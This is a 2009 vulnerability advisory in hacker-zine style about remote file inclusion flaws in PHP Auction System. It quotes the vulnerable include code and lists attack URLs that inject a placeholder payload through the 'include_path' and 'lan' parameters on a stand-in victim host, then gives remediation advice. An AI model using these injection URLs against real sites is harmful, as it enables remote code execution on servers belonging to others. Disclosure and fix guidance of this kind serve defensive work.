[»]=======================================================================================================[_][-][X] [»] [»] [»] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [»] [»] [»] [»] ======= ------d-------m------ ==== ==== [»] [»] || = | |(o o)| | || || || [»] [»] || = ||(~)|| || || [»] [»] ======= /|\ || || [»] [»]=============================================================================================================[»] [»] Author : ~darkmasking~ [»] [»] Date : January, 6th 2009 [»] [»] Web : https://www.idsafeshield.com [»] [»] Contact : support[at]idsafeshield[dot]com [»] [»] Critical Level : Dangerous [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] Affected software description : [»] [»] Software : PHP Auction System [»] [»] Vendor : http://www.phpauctions.info/ [»] [»] Price : $59.99 [»] [»]=============================================================================================================[»] [»] [»] [»] [~] Vulnerable file [»] [»] [»] [»] [+] all file below is affected by "include_path" parameter [»] [»] [»] [»] ./includes/settings.inc.php [»] [»] $password_file = $include_path."passwd.inc.php"; [»] [»] include($password_file); [»] [»] include $include_path."fonts.inc.php"; [»] [»] include $include_path."fontsize.inc.php"; [»] [»] include($include_path."currency.inc.php"); [»] [»] include($include_path."errors.inc.php"); [»] [»] include($include_path."https.inc.php"); [»] [»] [»] [»] ./includes/auction_confirmation.inc.php [»] [»] require("./includes/messages.inc.php"); [»] [»] [»] [»] ./includes/converter.inc.php [»] [»] include($include_path."nusoap.php"); [»] [»] [»] [»] ./includes/messages.inc.php [»] [»] require($include_path.'messages.'.$language.'.inc.php'); [»] [»] [»] [»] ./includes/stats.inc.php [»] [»] include $prefix."includes/useragent.inc.php"; [»] [»] include $prefix."includes/domains.inc.php"; [»] [»] [»] [»] 
./includes/useragent.inc.php [»] [»] include $prefix."includes/browsers.inc.php"; [»] [»] include $prefix."includes/platforms.inc.php"; [»] [»] [»] [»] ./includes/user_confirmation.inc.php [»] [»] require("./includes/messages.inc.php"); [»] [»] [»] [»] [»] [»] [+] All files below are affected by the "lan" parameter [»] [»] [»] [»] ./browse.php [»] [»] ./search.php [»] [»] if(!empty($_GET['lan'])) { [»] [»] $language = $lan; [»] [»] $_SESSION['language'] = $language; [»] [»] [»] [»] #// Set language cookie [»] [»] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [»] [»] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [»] [»] $language = $SETTINGS['defaultlanguage']; [»] [»] $_SESSION['language'] = $language; [»] [»] [»] [»] #// Set language cookie [»] [»] setcookie("USERLANGUAGE",$language,time()+31536000); [»] [»] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [»] [»] $language = $_COOKIE['USERLANGUAGE']; [»] [»] } [»] [»] [»] [»] require($include_path.'messages.'.$language.'.inc.php'); [»] [»] [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Exploit [»] [»] [»] [»] [+] "include_path" parameter [»] [»] [»] [»] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [»] [»] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [»] [»] [»] [»] [»] [»] [+] "lan" parameter [»] [»] [»] [»] 
http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [»] [»] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [»] [»] [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] How to fix this vulnerability [»] [»] [»] [»] Edit the source code to ensure that input is properly validated. Where possible, [»] [»] make a list of accepted filenames (for "lan", a list of accepted language codes) and restrict the input to that list. [»] [»] Note that the language value is also read back from the USERLANGUAGE cookie before it reaches require(), so the cookie path needs the same validation as the "lan" parameter. [»] [»] The exploit relies on request parameters being copied into plain variables such as $include_path and $lan, which is what register_globals does (the snippet above checks $_GET['lan'] but then uses the bare $lan); disabling register_globals closes that route. [»] [»] [»] [»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»] [»] include or otherwise use a remote file using a URL rather than a local file path. [»] [»] It is recommended to disable this option in php.ini; since PHP 5.2, remote include/require is additionally controlled by allow_url_include, which should be disabled as well. [»] [»] Disabling these options only blocks remote inclusion: an unvalidated value can still select an arbitrary local file, so the accepted-filename list above is the actual fix and the php.ini changes are defence in depth. [»] [»] [»] [»]-------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Greetz [»] [»] [»] [»] BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ] [»] [»] [»] [»] [»] [»]=============================================================================================================[»]